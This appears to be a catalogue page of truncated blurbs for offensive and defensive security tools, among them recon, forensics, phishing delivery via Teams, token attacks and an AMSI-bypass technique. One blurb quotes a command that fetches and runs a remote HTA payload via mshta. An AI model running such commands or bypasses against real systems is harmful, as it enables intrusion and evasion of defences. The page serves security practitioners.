domainim Domainim is a Blazing fast domain reconnaissance tool for bounty hunters written in Nim. Features Virtual hostname enumeration Reverse DNS lookup Subdomains as input Verbose output TCP port scanning with full user control...
PeCoReT PeCoReT (Pentest Collaboration and Reporting Tool) is an open-source application to manage your pentest projects. PeCoReT allows pentesters to focus on testing instead of writing the report. It can be customized and once...
Carseat is a Python implementation of Seatbelt. This tool contains all (all minus one technically) modules in Seatbelt that support remote execution as an option. Just like Seatbelt you likely will need privileged access...
Live Forensicator Live Forensicator is part of the Black Widow Toolbox, its aim is to assist Forensic Investigators and Incidence responders in carrying out a quick live forensic investigation. It achieves this by gathering...
Fennec fennec is an artifact collection tool written in Rust to be used during an incident response on *nix based systems. fennec allows you to write a configuration file that contains how to collect...
Seekr Seekr is a multi-purpose toolkit for gathering and managing OSINT-data with a sleek web interface. Our desktop view enables you to have all of your favorite OSINT tools integrated into one. The backend...
TeamsPhisher TeamsPhisher is a Python3 program that facilitates the delivery of phishing messages and attachments to Microsoft Teams users whose organizations allow external communications. It is not ordinarily possible to send files to Teams...
Damn Vulnerable RESTaurant An intentionally vulnerable API service designed for learning and training purposes dedicated to developers, ethical hackers, and security engineers. The idea of the project is to provide an environment that can...
Sessionless Sessionless is a Burp Suite extension for editing, signing, verifying, and attacking signed tokens: Django TimestampSigner, ItsDangerous Signer, Express cookie-session middleware, OAuth2 Proxy, and Tornado’s signed cookies. It provides automatic detection and in-line editing of tokens within HTTP...
SentryPeer A distributed list of bad IP addresses and phone numbers was collected via a SIP Honeypot. This is basically a fraud detection tool. It lets bad actors try to make phone calls and...
ShellcodeGenZ takes your commands (like mshta.exe http://192.168.0.1/azi.hta) and turns ’em into shellcode that’s ready to flex. It hunts down bad chars (like 0x0a, 0x0b, or the default 0x00), lets you yeet ’em manually or auto...
Digital Forensics Lab & Shared Cyber Forensic Intelligence Repository Features of Repository Interactive Digital Forensics Labs: Tailored for students and faculty engagement Linux-Centric Lab Environment: Utilizes Kali Linux exclusively for all labs Visual Learning Support: Each lab...
Telerecon Telerecon is a comprehensive OSINT reconnaissance framework for researching, investigating, and scraping Telegram. For example: Input a target username, and Telerecon efficiently crawls across multiple chats gathering profile metadata, account activity, and user...
EntraFalcon is a PowerShell-based assessment tool for pentesters, security analysts, and system administrators to evaluate the security posture of a Microsoft Entra ID environment. Designed for ease of use, EntraFalcon runs on PowerShell 5.1...
This technique exploits the COM-level mechanics AMSI uses when delegating scan requests to antivirus (AV) providers through RPC. By hooking into the NdrClientCall3 function—used internally by the RPC runtime to marshal and dispatch function...
ntfstool NTFSTool is a forensic tool to play with disks and NTFS volumes. It supports reading partition info (mbr, partition table, vbr) but also information on bitlocker encrypted partition (fve). See examples below to...
